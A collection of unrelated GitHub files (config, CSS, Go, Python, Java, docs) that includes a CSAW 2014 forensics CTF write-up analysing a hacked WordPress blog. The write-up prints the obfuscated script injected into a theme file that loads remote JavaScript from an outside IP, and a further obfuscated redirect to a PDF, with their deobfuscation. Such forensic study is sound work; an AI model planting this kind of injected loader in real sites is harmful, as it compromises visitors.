$(ev.target).closest('.hasPopover,.webui-popover').length > 0 if (!match) { $('.hasPopover').webuiPopover('hide'); } }).contextmenu(function (ev) { // Hiding the context menu outside of the page ev.preventDefault(); }); $('#pathbar').on('mousedown', function (ev) { // set menu as active //console.log($(ev.target).closest('li').siblings()) PATH.setActive($(ev.target).closest('li')); }); });
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="UTF-8"?> <databaseChangeLog xmlns="http://www.liquibase.org/xml/ns/dbchangelog/1.9" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.liquibase.org/xml/ns/dbchangelog/1.9 http://www.liquibase.org/xml/ns/dbchangelog/dbchangelog-1.9.xsd"> <changeSet author="jmiranda" id="1498672238798-1"> <sql> UPDATE product_group SET name = description, description = NULL; </sql> </changeSet> <changeSet author="jmiranda" id="1498672238798-2"> <comment>Move name column to make it easier to read.</comment> <sql> ALTER TABLE product_group MODIFY name varchar(255) AFTER id; </sql> </changeSet> </databaseChangeLog>
{ "pile_set_name": "Github" }
/*! * Durandal 2.0.0 Copyright (c) 2012 Blue Spire Consulting, Inc. All Rights Reserved. * Available via the MIT license. * see: http://durandaljs.com or https://github.com/BlueSpire/Durandal for details */ .modalBlockout { position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: black; opacity: 0; pointer-events: auto; -webkit-backface-visibility: hidden; -webkit-transition: opacity 0.1s linear; -moz-transition: opacity 0.1s linear; -o-transition: opacity 0.1s linear; transition: opacity 0.1s linear; } .modalHost { top: 50%; left: 50%; position: fixed; opacity: 0; -webkit-backface-visibility: hidden; -webkit-transition: opacity 0.1s linear; -moz-transition: opacity 0.1s linear; -o-transition: opacity 0.1s linear; transition: opacity 0.1s linear; } .messageBox { background-color: white; border: 1px solid #999; border: 1px solid rgba(0, 0, 0, 0.3); -webkit-border-radius: 6px; -moz-border-radius: 6px; border-radius: 6px; outline: none; -webkit-box-shadow: 0 3px 7px rgba(0, 0, 0, 0.3); -moz-box-shadow: 0 3px 7px rgba(0, 0, 0, 0.3); box-shadow: 0 3px 7px rgba(0, 0, 0, 0.3); -webkit-background-clip: padding-box; -moz-background-clip: padding-box; background-clip: padding-box; min-width: 300px; } .durandal-view-404 { color: red; margin: 8px 0; padding: 8px; -webkit-box-shadow: 0 3px 7px rgba(0, 0, 0, 0.3); -moz-box-shadow: 0 3px 7px rgba(0, 0, 0, 0.3); box-shadow: 0 3px 7px rgba(0, 0, 0, 0.3); border: 1px solid #999; border: 1px solid rgba(0, 0, 0, 0.3); -webkit-border-radius: 6px; -moz-border-radius: 6px; border-radius: 6px; }
{ "pile_set_name": "Github" }
list ==l list ==m /foo l .append /bar l .append /quux l .append l { dump } each [ /a /b /c ] m .append m { dump } each m len dump 2 m * dump [ /a /b /c ] m .append1 m { dump } each list _ [ 1 2 3 ] -01 .append list _ [ 3 4 5 ] -01 .append add ==a a dump a len dump a |dump each a .pop a dump a len dump a |dump each 42 a .append a dump a len dump a |dump each
{ "pile_set_name": "Github" }
#ifndef TEST1 #define TEST1 #include "test2.hh" void test1(); #endif
{ "pile_set_name": "Github" }
// Copyright 2019 The Go Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. // +build go1.13 // Package ed25519 implements the Ed25519 signature algorithm. See // https://ed25519.cr.yp.to/. // // These functions are also compatible with the “Ed25519” function defined in // RFC 8032. However, unlike RFC 8032's formulation, this package's private key // representation includes a public key suffix to make multiple signing // operations with the same key more efficient. This package refers to the RFC // 8032 private key as the “seed”. // // Beginning with Go 1.13, the functionality of this package was moved to the // standard library as crypto/ed25519. This package only acts as a compatibility // wrapper. package ed25519 import ( "crypto/ed25519" "io" ) const ( // PublicKeySize is the size, in bytes, of public keys as used in this package. PublicKeySize = 32 // PrivateKeySize is the size, in bytes, of private keys as used in this package. PrivateKeySize = 64 // SignatureSize is the size, in bytes, of signatures generated and verified by this package. SignatureSize = 64 // SeedSize is the size, in bytes, of private key seeds. These are the private key representations used by RFC 8032. SeedSize = 32 ) // PublicKey is the type of Ed25519 public keys. // // This type is an alias for crypto/ed25519's PublicKey type. // See the crypto/ed25519 package for the methods on this type. type PublicKey = ed25519.PublicKey // PrivateKey is the type of Ed25519 private keys. It implements crypto.Signer. // // This type is an alias for crypto/ed25519's PrivateKey type. // See the crypto/ed25519 package for the methods on this type. type PrivateKey = ed25519.PrivateKey // GenerateKey generates a public/private key pair using entropy from rand. // If rand is nil, crypto/rand.Reader will be used. func GenerateKey(rand io.Reader) (PublicKey, PrivateKey, error) { return ed25519.GenerateKey(rand) } // NewKeyFromSeed calculates a private key from a seed. It will panic if // len(seed) is not SeedSize. This function is provided for interoperability // with RFC 8032. RFC 8032's private keys correspond to seeds in this // package. func NewKeyFromSeed(seed []byte) PrivateKey { return ed25519.NewKeyFromSeed(seed) } // Sign signs the message with privateKey and returns a signature. It will // panic if len(privateKey) is not PrivateKeySize. func Sign(privateKey PrivateKey, message []byte) []byte { return ed25519.Sign(privateKey, message) } // Verify reports whether sig is a valid signature of message by publicKey. It // will panic if len(publicKey) is not PublicKeySize. func Verify(publicKey PublicKey, message, sig []byte) bool { return ed25519.Verify(publicKey, message, sig) }
{ "pile_set_name": "Github" }
# CSAW CTF 2014: Fluffy No More **Category:** Forensics **Points:** 300 **Description:** > OH NO WE'VE BEEN HACKED!!!!!! -- said the Eye Heart Fluffy Bunnies Blog owner. Life was grand for the fluff fanatic until one day the site's users started to get attacked! Apparently fluffy bunnies are not just a love of fun furry families but also furtive foreign governments. The notorious "Forgotten Freaks" hacking group was known to be targeting high powered politicians. Were the cute bunnies the next in their long list of conquests!?? > > Well... The fluff needs your stuff. I've pulled the logs from the server for you along with a backup of its database and configuration. Figure out what is going on! > > Written by brad_anton > > [CSAW2014-FluffyNoMore-v0.1.tar.bz2](CSAW2014-FluffyNoMore-v0.1.tar.bz2) ## Write-up As its extension suggests, [the provided `CSAW2014-FluffyNoMore-v0.1.tar.bz2` file](CSAW2014-FluffyNoMore-v0.1.tar.bz2) is a bzip2-compressed tarball: ```bash $ file CSAW2014-FluffyNoMore-v0.1.tar.bz2 CSAW2014-FluffyNoMore-v0.1.tar.bz2: bzip2 compressed data, block size = 900k ``` Let’s extract it: ```bash $ tar xjfv CSAW2014-FluffyNoMore-v0.1.tar.bz2 x CSAW2014-FluffyNoMore-v0.1/ x CSAW2014-FluffyNoMore-v0.1/etc_directory.tar.bz2 x CSAW2014-FluffyNoMore-v0.1/logs.tar.bz2 x CSAW2014-FluffyNoMore-v0.1/mysql_backup.sql.bz2 x CSAW2014-FluffyNoMore-v0.1/webroot.tar.bz2 ``` Oh, it contains more tarballs! Let’s extract those as well: ```bash $ cd CSAW2014-FluffyNoMore-v0.1 $ for file in *.tar.bz2; do mkdir -p "${file}-extracted"; tar --directory "${file}-extracted" -xjf "${file}"; done ``` Viewing `logs.tar.bz2-extracted/var/log/auth.log` reveals an interesting entry: ``` Sep 17 19:20:09 ubuntu sudo: ubuntu : TTY=pts/0 ; PWD=/home/ubuntu/CSAW2014-WordPress/var/www ; USER=root ; COMMAND=/usr/bin/vi /var/www/html/wp-content/themes/twentythirteen/js/html5.js ``` Someone with root access to the server edited the web-exposed `/wp-content/themes/twentythirteen/js/html5.js` file. Reviewing the file’s contents (`webroot.tar.bz2-extracted/var/www/html/wp-content/themes/twentythirteen/js/html5.js`), it’s clear that some malicious JavaScript code was inserted. ```js var g="ti";var c="HTML Tags";var f=". li colgroup br src datalist script option .";f = f.split(" ");c="";k="/";m=f[6];for(var i=0;i<f.length;i++){c+=f[i].length.toString();}v=f[0];x="\'ht";b=f[4];f=2541*6-35+46+12-15269;c+=f.toString();f=(56+31+68*65+41-548)/4000-1;c+=f.toString();f="";c=c.split("");var w=0;u="s";for(var i=0;i<c.length;i++){if(((i==3||i==6)&&w!=2)||((i==8)&&w==2)){f+=String.fromCharCode(46);w++;}f+=c[i];} i=k+"anal"; document.write("<"+m+" "+b+"="+x+"tp:"+k+k+f+i+"y"+g+"c"+u+v+"j"+u+"\'>\</"+m+"\>"); ``` The above script is equivalent to the following: ```js document.write("<script src='http://128.238.66.100/analytics.js'><\/script>"); ``` Let’s download [the `analytics.js` file](analytics.js) so we can take a look at it: ```bash $ wget http://128.238.66.100/analytics.js ``` The file consists of minified code, most of which is legitimate. A small part of it stands out because it’s obfuscated, though: ```js var _0x91fe=["\x68\x74\x74\x70\x3A\x2F\x2F\x31\x32\x38\x2E\x32\x33\x38\x2E\x36\x36\x2E\x31\x30\x30\x2F\x61\x6E\x6E\x6F\x75\x6E\x63\x65\x6D\x65\x6E\x74\x2E\x70\x64\x66","\x5F\x73\x65\x6C\x66","\x6F\x70\x65\x6E"];window[_0x91fe[2]](_0x91fe[0],_0x91fe[1]); ``` This [is equivalent to](https://mothereff.in/js-escapes#1var%20%5f0x91fe%3D%5B%22%5Cx68%5Cx74%5Cx74%5Cx70%5Cx3A%5Cx2F%5Cx2F%5Cx31%5Cx32%5Cx38%5Cx2E%5Cx32%5Cx33%5Cx38%5Cx2E%5Cx36%5Cx36%5Cx2E%5Cx31%5Cx30%5Cx30%5Cx2F%5Cx61%5Cx6E%5Cx6E%5Cx6F%5Cx75%5Cx6E%5Cx63%5Cx65%5Cx6D%5Cx65%5Cx6E%5Cx74%5Cx2E%5Cx70%5Cx64%5Cx66%22%2C%22%5Cx5F%5Cx73%5Cx65%5Cx6C%5Cx66%22%2C%22%5Cx6F%5Cx70%5Cx65%5Cx6E%22%5D%3Bwindow%5B%5f0x91fe%5B2%5D%5D%28%5f0x91fe%5B0%5D%2C%5f0x91fe%5B1%5D%29%3B): ```js var _0x91fe=["http://128.238.66.100/announcement.pdf","_self","open"]; window[_0x91fe[2]](_0x91fe[0],_0x91fe[1]); ``` …which is equivalent to: ```js window.open('http://128.238.66.100/announcement.pdf', '_self'); ``` Let’s download [that `announcement.pdf` file](announcement.pdf): ```bash $ wget http://128.238.66.100/announcement.pdf ``` Opening the PDF file in [PDF Stream Dumper](http://sandsprite.com/blogs/index.php?uid=7&pid=57) reveals some hidden JavaScript code: ![](pdf-stream-dumper.png) ```js var _0xee0b=["\x59\x4F\x55\x20\x44\x49\x44\x20\x49\x54\x21\x20\x43\x4F\x4E\x47\x52\x41\x54\x53\x21\x20\x66\x77\x69\x77\x2C\x20\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x20\x6F\x62\x66\x75\x73\x63\x61\x74\x69\x6F\x6E\x20\x69\x73\x20\x73\x6F\x66\x61\x20\x6B\x69\x6E\x67\x20\x64\x75\x6D\x62\x20\x20\x3A\x29\x20\x6B\x65\x79\x7B\x54\x68\x6F\x73\x65\x20\x46\x6C\x75\x66\x66\x79\x20\x42\x75\x6E\x6E\x69\x65\x73\x20\x4D\x61\x6B\x65\x20\x54\x75\x6D\x6D\x79\x20\x42\x75\x6D\x70\x79\x7D"];var y=_0xee0b[0]; ``` This [is equivalent to](https://mothereff.in/js-escapes#1var%20%5f0xee0b%3D%5B%22%5Cx59%5Cx4F%5Cx55%5Cx20%5Cx44%5Cx49%5Cx44%5Cx20%5Cx49%5Cx54%5Cx21%5Cx20%5Cx43%5Cx4F%5Cx4E%5Cx47%5Cx52%5Cx41%5Cx54%5Cx53%5Cx21%5Cx20%5Cx66%5Cx77%5Cx69%5Cx77%5Cx2C%5Cx20%5Cx6A%5Cx61%5Cx76%5Cx61%5Cx73%5Cx63%5Cx72%5Cx69%5Cx70%5Cx74%5Cx20%5Cx6F%5Cx62%5Cx66%5Cx75%5Cx73%5Cx63%5Cx61%5Cx74%5Cx69%5Cx6F%5Cx6E%5Cx20%5Cx69%5Cx73%5Cx20%5Cx73%5Cx6F%5Cx66%5Cx61%5Cx20%5Cx6B%5Cx69%5Cx6E%5Cx67%5Cx20%5Cx64%5Cx75%5Cx6D%5Cx62%5Cx20%5Cx20%5Cx3A%5Cx29%5Cx20%5Cx6B%5Cx65%5Cx79%5Cx7B%5Cx54%5Cx68%5Cx6F%5Cx73%5Cx65%5Cx20%5Cx46%5Cx6C%5Cx75%5Cx66%5Cx66%5Cx79%5Cx20%5Cx42%5Cx75%5Cx6E%5Cx6E%5Cx69%5Cx65%5Cx73%5Cx20%5Cx4D%5Cx61%5Cx6B%5Cx65%5Cx20%5Cx54%5Cx75%5Cx6D%5Cx6D%5Cx79%5Cx20%5Cx42%5Cx75%5Cx6D%5Cx70%5Cx79%5Cx7D%22%5D%3Bvar%20y%3D%5f0xee0b%5B0%5D%3B): ```js var _0xee0b=["YOU DID IT! CONGRATS! fwiw, javascript obfuscation is sofa king dumb :) key{Those Fluffy Bunnies Make Tummy Bumpy}"]; var y=_0xee0b[0]; ``` The flag is `Those Fluffy Bunnies Make Tummy Bumpy`. ## Other write-ups and resources * <http://balidani.blogspot.com/2014/09/csaw14-fluffy-no-more-writeup.html> * <http://sugarstack.io/csaw-2014-fluffy-no-more.html> * <https://hackucf.org/blog/csaw-2014-forensics-300-fluffy-no-more/> * <http://bt3gl.github.io/csaw-ctf-2014-forensics-300-fluffy-no-more.html> * <http://blog.squareroots.de/en/2014/09/csaw14-fluffy-no-more/>
{ "pile_set_name": "Github" }
{% load static %} <script src="{% static "vendor/jqwidgets/jqxcore.js" %}" type="text/javascript"></script> <script src="{% static "vendor/jqwidgets/jqxdata.js" %}" type="text/javascript"></script> <script src="{% static "vendor/jqwidgets/jqxbuttons.js" %}" type="text/javascript"></script> <script src="{% static "vendor/jqwidgets/jqxscrollbar.js" %}" type="text/javascript"></script> <script src="{% static "vendor/jqwidgets/jqxmenu.js" %}" type="text/javascript"></script> <script src="{% static "vendor/jqwidgets/jqxlistbox.js" %}" type="text/javascript"></script> <script src="{% static "vendor/jqwidgets/jqxdropdownlist.js" %}" type="text/javascript"></script> <script src="{% static "vendor/jqwidgets/jqxgrid.js" %}" type="text/javascript"></script> <script src="{% static "vendor/jqwidgets/jqxgrid.selection.js" %}" type="text/javascript"></script> <script src="{% static "vendor/jqwidgets/jqxgrid.columnsresize.js" %}" type="text/javascript"></script> <script src="{% static "vendor/jqwidgets/jqxgrid.filter.js" %}" type="text/javascript"></script> <script src="{% static "vendor/jqwidgets/jqxgrid.sort.js" %}" type="text/javascript"></script> <script src="{% static "vendor/jqwidgets/jqxgrid.pager.js" %}" type="text/javascript"></script> <script src="{% static "vendor/jqwidgets/jqxgrid.grouping.js" %}" type="text/javascript"></script> <script src="{% static "vendor/jqwidgets/jqxgrid.aggregates.js" %}" type="text/javascript"></script> <script src="{% static "vendor/jqwidgets/jqxcalendar.js" %}" type="text/javascript"></script> <script src="{% static "vendor/jqwidgets/jqxdatetimeinput.js" %}" type="text/javascript"></script> <script src="{% static "vendor/jqwidgets/jqxcheckbox.js" %}" type="text/javascript"></script> <script src="{% static "vendor/jqwidgets/globalization/globalize.js" %}" type="text/javascript"></script> <script src="{% static "vendor/jqwidgets/jqxwindow.js" %}" type="text/javascript"></script> <script src="{% static "vendor/jqwidgets/jqxdata.export.js" %}" type="text/javascript"></script> <script src="{% static "vendor/jqwidgets/jqxgrid.export.js" %}" type="text/javascript"></script> <script src="{% static "vendor/jqwidgets/jqxdraw.js" %}" type="text/javascript"></script> <script src="{% static "vendor/jqwidgets/jqxchart.core.js" %}" type="text/javascript"></script> <script src="{% static "vendor/jqwidgets/jqxtabs.js" %}" type="text/javascript"></script> <script src="{% static "vendor/jqwidgets/jqxdatatable.js" %}" type="text/javascript"></script> <script src="{% static "vendor/jqwidgets/jqxtreegrid.js" %}" type="text/javascript"></script> <script src="{% static "vendor/jqwidgets/jqxchart.rangeselector.js" %}" type="text/javascript"></script>
{ "pile_set_name": "Github" }
insert into t values (91, 10, 100) insert into t values (92, 20, 200) insert into t values (95, 50, 500) insert into t values (96, 60, 600) insert into t values (910, 100, 1000) insert into t values (923, 230, 2300) insert into t values (9123, 1230, 12300) insert into t values (911115, 9111150, 91111500) insert into t values (-91, -910, -9100) insert into t values (90, 0, 900)
{ "pile_set_name": "Github" }
/* * Copyright (c) 2019 The sky Authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.sky.xposed.rimet.plugin.interfaces; import android.app.Activity; /** * Created by sky on 2018/12/21. */ public interface XPlugin { /** * 获取插件信息 * @return */ Info getInfo(); /** * 是否需要处理 * @return */ boolean isHandler(); /** * 初始化 */ void initialization(); /** * 处理加载的包 */ void onHandleLoadPackage(); /** * 释放 */ void release(); /** * 打开设置 */ void openSettings(Activity activity); /** * 是否启用 * @param flag * @param defValue */ boolean isEnable(int flag, boolean defValue); /** * 设置是否启用 * @param flag * @param enable */ void setEnable(int flag, boolean enable); /** * 插件信息 */ interface Info { int getId(); String getName(); String getDesc(); } }
{ "pile_set_name": "Github" }
<!--- Copyright 2015 The AMP HTML Authors. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS-IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> # AppNexus ## Examples ### Basic single ad - tagid ```html <amp-ad width="300" height="250" type="appnexus" data-tagid="6063968"> </amp-ad> ``` ### Basic single ad - member and code ```html <amp-ad width="300" height="250" type="appnexus" data-member="958" data-code="inv_code_test" > </amp-ad> ``` ### AST single ad call with keywords Note: you should use either the basic setup or AST setup. Do not mix types on the same page. ```html <amp-ad width="320" height="50" type="appnexus" data-target="apn_ad_40954389058" json='{"pageOpts": {"member": 958,"invCode": "ast_guaranteed_prios_1","keywords": {"adSite":"mobile-smh","cat":"business","cat1":"bankingandfinance","ctype":"article","synd":"amp"}},"targetId": "apn_ad_40954389058","sizes": [[300, 50]],"adUnits": [{"invCode": "ast_guaranteed_prios_1","disablePsa": true,"sizes": [[320, 50],[300, 50]],"targetId": "apn_ad_5675675648","keywords": {"pos": 1}},{"invCode": "ast_guaranteed_prios_1","disablePsa": true,"sizes": [30, 250],"targetId": "apn_ad_5675675648","keywords": {"pos": 2}}]}' class="i-amphtml-element i-amphtml-layout-fixed i-amphtml-layout-size-defined i-amphtml-layout" > </amp-ad> ``` ### AST for multiple sync ads on the page ```html <amp-ad width="300" height="250" type="appnexus" data-target="apn_ad_40954389058" json='{"pageOpts": {"member": 958},"adUnits": [{"disablePsa": true,"invCode": "ast_guaranteed_prios_1","tagId": 12345,"sizes": [300, 250],"targetId": "apn_ad_40954389058"}, {"invCode": "ast_guaranteed_prios_1","tagId": 456,"sizes": [160, 600],"targetId": "apn_ad_5675675648"}]}' > </amp-ad> <amp-ad width="160" height="600" type="appnexus" data-target="apn_ad_5675675648" json='{"pageOpts": {"member": 958},"adUnits": [{"disablePsa": true,"invCode": "ast_guaranteed_prios_1","tagId": 12345,"sizes": [300, 250],"targetId": "apn_ad_40954389058"}, {"invCode": "ast_guaranteed_prios_1","tagId": 456,"sizes": [160, 600],"targetId": "apn_ad_5675675648"}]}' > </amp-ad> ``` ### AST Infinite scroll ads on the page, Include adUnit details only in the amp-ad tag which you want to lazy load Note: You would lose competitive exclusion if you use this setup. ```html <amp-ad width="300" height="250" type="appnexus" data-target="apn_ad_40954389058" json='{"pageOpts": {"member": 958},"adUnits": [{"disablePsa": true,"invCode": "ast_guaranteed_prios_1","tagId": 12345,"sizes": [300, 250],"targetId": "apn_ad_40954389058"}, {"invCode": "ast_guaranteed_prios_1","tagId": 456,"sizes": [160, 600],"targetId": "apn_ad_5675675648"}]}' > </amp-ad> <amp-ad width="160" height="600" type="appnexus" data-target="apn_ad_5675675648" json='{"pageOpts": {"member": 958},"adUnits": [{"disablePsa": true,"invCode": "ast_guaranteed_prios_1","tagId": 12345,"sizes": [300, 250],"targetId": "apn_ad_40954389058"}, {"invCode": "ast_guaranteed_prios_1","tagId": 456,"sizes": [160, 600],"targetId": "apn_ad_5675675648"}]}' > </amp-ad> By including `apn_ad_3` adUnit details separately ads for this unit will only be requested when user scrolls to this tag <amp-ad width="728" height="90" type="appnexus" data-target="apn_ad_3" json='{"pageOpts": {"member": 958},"adUnits": [{"tagId": 6063968,"sizes": [728,90],"targetId":"apn_ad_3"}]}' > </amp-ad> ``` ## Configuration See AppNexus [Tiny Tag documentation](https://wiki.appnexus.com/display/adnexusdocumentation/Dynamic+TinyTag+Parameters) or [AST documentation](https://wiki.appnexus.com/pages/viewpage.action?pageId=75793258) for details on input parameters. ### Enable debugging To enable debugging with the AST type of tags, just set `data-debug=true` in all your amp-ad tags. ```html <amp-ad width="300" height="250" type="appnexus" data-target="apn_ad_40954389058" data-debug="true" json='{"pageOpts":{"member": 958}, "adUnits": [{"disablePsa": true, "invCode": "ast_guaranteed_prios_1","sizes": [300,250],"targetId": "apn_ad_40954389058"}, {"invCode": "ast_guaranteed_prios_1","sizes": [160,600],"targetId":"apn_ad_5675675648"}]}' > </amp-ad> <amp-ad width="160" height="600" type="appnexus" data-target="apn_ad_5675675648" data-debug="true" json='{"pageOpts":{"member": 958}, "adUnits": [{"disablePsa": true, "invCode": "ast_guaranteed_prios_1","sizes": [300,250],"targetId": "apn_ad_40954389058"}, {"invCode": "ast_guaranteed_prios_1","sizes": [160,600],"targetId":"apn_ad_5675675648"}]}' > </amp-ad> ```
{ "pile_set_name": "Github" }
''' Implementation of a simplified agent - with expectation/action split, but without normalization in the action stream ''' from __future__ import print_function import numpy as np import time import tensorflow as tf from . import tf_ops as my_ops import os import re from .agent import Agent class FuturePredictorAgentAdvantageNoNorm(Agent): def make_net(self, input_images, input_measurements, input_actions, input_objectives, reuse=False): if reuse: tf.get_variable_scope().reuse_variables() self.fc_val_params = np.copy(self.fc_joint_params) self.fc_val_params['out_dims'][-1] = self.target_dim self.fc_adv_params = np.copy(self.fc_joint_params) self.fc_adv_params['out_dims'][-1] = len(self.net_discrete_actions) * self.target_dim p_img_conv = my_ops.conv_encoder(input_images, self.conv_params, 'p_img_conv', msra_coeff=0.9) p_img_fc = my_ops.fc_net(my_ops.flatten(p_img_conv), self.fc_img_params, 'p_img_fc', msra_coeff=0.9) p_meas_fc = my_ops.fc_net(input_measurements, self.fc_meas_params, 'p_meas_fc', msra_coeff=0.9) if isinstance(self.fc_obj_params, np.ndarray): p_obj_fc = my_ops.fc_net(input_objectives, self.fc_obj_params, 'p_obj_fc', msra_coeff=0.9) p_concat_fc = tf.concat([p_img_fc,p_meas_fc,p_obj_fc], 1) else: p_concat_fc = tf.concat([p_img_fc,p_meas_fc], 1) if self.random_objective_coeffs: raise Exception('Need fc_obj_params with randomized objectives') p_val_fc = my_ops.fc_net(p_concat_fc, self.fc_val_params, 'p_val_fc', last_linear=True, msra_coeff=0.9) p_adv_fc = my_ops.fc_net(p_concat_fc, self.fc_adv_params, 'p_adv_fc', last_linear=True, msra_coeff=0.9) adv_reshape = tf.reshape(p_adv_fc, [-1, len(self.net_discrete_actions), self.target_dim]) #pred_all_nomean = adv_reshape - tf.reduce_mean(adv_reshape, reduction_indices=1, keep_dims=True) pred_all = adv_reshape + tf.reshape(p_val_fc, [-1, 1, self.target_dim]) pred_relevant = tf.boolean_mask(pred_all, tf.cast(input_actions, tf.bool)) return pred_all, pred_relevant def make_losses(self, pred_relevant, targets_preprocessed, objective_indices, objective_coeffs): # make a loss function and compute some summary numbers per_target_loss = my_ops.mse_ignore_nans(pred_relevant, targets_preprocessed, reduction_indices=0) loss = tf.reduce_sum(per_target_loss) # compute objective value, just for logging purposes # TODO add multiplication by the objective_coeffs (somehow not trivial) obj = tf.reduce_sum(self.postprocess_predictions(targets_preprocessed), 1) #obj = tf.sum(self.postprocess_predictions(targets_preprocessed[:,objective_indices]) * objective_coeffs[None,:], axis=1) obj_nonan = tf.where(tf.is_nan(obj), tf.zeros_like(obj), obj) num_valid_targets = tf.reduce_sum(1-tf.cast(tf.is_nan(obj), tf.float32)) mean_obj = tf.reduce_sum(obj_nonan) / num_valid_targets # summaries obj_sum = tf.summary.scalar("objective_todo", mean_obj) #TODO per_target_loss_sums = [] #per_target_loss_sums = [tf.summary.scalar(name, loss) for name,loss in zip(self.target_names,per_target_loss)] loss_sum = tf.summary.scalar("full loss", loss) #self.per_target_loss = tf.get_variable('avg_targets', [self.target_dim], initializer=tf.constant_initializer(value=0.)) full_loss = loss errs_to_print = [loss] short_summary = [loss_sum] detailed_summary = per_target_loss_sums + [obj_sum] return full_loss, errs_to_print, short_summary, detailed_summary def act_net(self, state_imgs, state_meas, objective_coeffs): #Act given a state and objective_coeffs if objective_coeffs.ndim == 1: curr_objective_coeffs = np.tile(objective_coeffs[None,:],(state_imgs.shape[0],1)) else: curr_objective_coeffs = objective_coeffs predictions = self.sess.run(self.pred_all, feed_dict={self.input_images: state_imgs, self.input_measurements: state_meas, self.input_objective_coeffs: curr_objective_coeffs}) self.curr_predictions = predictions[:,:,self.objective_indices]*curr_objective_coeffs[:,None,:] self.curr_objectives = np.sum(self.curr_predictions, axis=2) curr_action = np.argmax(self.curr_objectives, axis=1) return curr_action
{ "pile_set_name": "Github" }
# Simple Flask Application This is a simple Flask application which takes a name from users and greets them by their name. ## Deployed application [https://evening-falls-17572.herokuapp.com](https://evening-falls-17572.herokuapp.com) ## Setup - Install python3, Here's a link to the documentation [Click here](http://docs.python-guide.org/en/latest/). - Start up the terminal and type ```pip install flask```. - Go to this application's root directory and open a terminal. - On Linux & Mac, type ```export FLASK_APP=app.py```; On Windows, type ```set FLASK_APP=app.py```. - Then run ```python -m flask run``` - Goto ```http://127.0.0.1:5000``` on your browser and you did it.
{ "pile_set_name": "Github" }
apiVersion: v1 kind: ServiceAccount metadata: name: presto labels: app: presto {{- if .Values.presto.spec.annotations }} annotations: {{ toYaml .Values.presto.spec.annotations | indent 4 }} {{- end }}
{ "pile_set_name": "Github" }
using System.Threading.Tasks; namespace AsyncConverter.Tests.Test.Data.FixReturnValueToTaskTests { public class Class { public async Task<int> TestAsync(bool a) { if(a) return 5; return await FooAsync(); } public Task<int> FooAsync() { return Task.FromResult(5); } } }
{ "pile_set_name": "Github" }
<vector xmlns:android="http://schemas.android.com/apk/res/android" android:width="24dp" android:height="24dp" android:viewportWidth="24" android:viewportHeight="24" android:tint="?attr/colorControlNormal"> <path android:fillColor="@android:color/white" android:pathData="M19,3h-4.18C14.4,1.84 13.3,1 12,1c-1.3,0 -2.4,0.84 -2.82,2L5,3c-1.1,0 -2,0.9 -2,2v14c0,1.1 0.9,2 2,2h14c1.1,0 2,-0.9 2,-2L21,5c0,-1.1 -0.9,-2 -2,-2zM12,3c0.55,0 1,0.45 1,1s-0.45,1 -1,1 -1,-0.45 -1,-1 0.45,-1 1,-1zM12,18l-5,-5h3L10,9h4v4h3l-5,5z"/> </vector>
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="UTF-8"?> <Scheme LastUpgradeVersion = "1000" version = "1.3"> <BuildAction parallelizeBuildables = "YES" buildImplicitDependencies = "YES"> <BuildActionEntries> <BuildActionEntry buildForTesting = "YES" buildForRunning = "YES" buildForProfiling = "YES" buildForArchiving = "YES" buildForAnalyzing = "YES"> <BuildableReference BuildableIdentifier = "primary" BlueprintIdentifier = "54B51125216C3D840033A6F3" BuildableName = "Maps.app" BlueprintName = "Maps" ReferencedContainer = "container:Maps.xcodeproj"> </BuildableReference> </BuildActionEntry> </BuildActionEntries> </BuildAction> <TestAction buildConfiguration = "Debug" selectedDebuggerIdentifier = "Xcode.DebuggerFoundation.Debugger.LLDB" selectedLauncherIdentifier = "Xcode.DebuggerFoundation.Launcher.LLDB" shouldUseLaunchSchemeArgsEnv = "YES"> <Testables> </Testables> <MacroExpansion> <BuildableReference BuildableIdentifier = "primary" BlueprintIdentifier = "54B51125216C3D840033A6F3" BuildableName = "Maps.app" BlueprintName = "Maps" ReferencedContainer = "container:Maps.xcodeproj"> </BuildableReference> </MacroExpansion> <AdditionalOptions> </AdditionalOptions> </TestAction> <LaunchAction buildConfiguration = "Debug" selectedDebuggerIdentifier = "Xcode.DebuggerFoundation.Debugger.LLDB" selectedLauncherIdentifier = "Xcode.DebuggerFoundation.Launcher.LLDB" language = "en" region = "US" launchStyle = "0" useCustomWorkingDirectory = "NO" ignoresPersistentStateOnLaunch = "NO" debugDocumentVersioning = "YES" debugServiceExtension = "internal" allowLocationSimulation = "YES"> <BuildableProductRunnable runnableDebuggingMode = "0"> <BuildableReference BuildableIdentifier = "primary" BlueprintIdentifier = "54B51125216C3D840033A6F3" BuildableName = "Maps.app" BlueprintName = "Maps" ReferencedContainer = "container:Maps.xcodeproj"> </BuildableReference> </BuildableProductRunnable> <AdditionalOptions> </AdditionalOptions> </LaunchAction> <ProfileAction buildConfiguration = "Release" shouldUseLaunchSchemeArgsEnv = "YES" savedToolIdentifier = "" useCustomWorkingDirectory = "NO" debugDocumentVersioning = "YES"> <BuildableProductRunnable runnableDebuggingMode = "0"> <BuildableReference BuildableIdentifier = "primary" BlueprintIdentifier = "54B51125216C3D840033A6F3" BuildableName = "Maps.app" BlueprintName = "Maps" ReferencedContainer = "container:Maps.xcodeproj"> </BuildableReference> </BuildableProductRunnable> </ProfileAction> <AnalyzeAction buildConfiguration = "Debug"> </AnalyzeAction> <ArchiveAction buildConfiguration = "Release" revealArchiveInOrganizer = "YES"> </ArchiveAction> </Scheme>
{ "pile_set_name": "Github" }
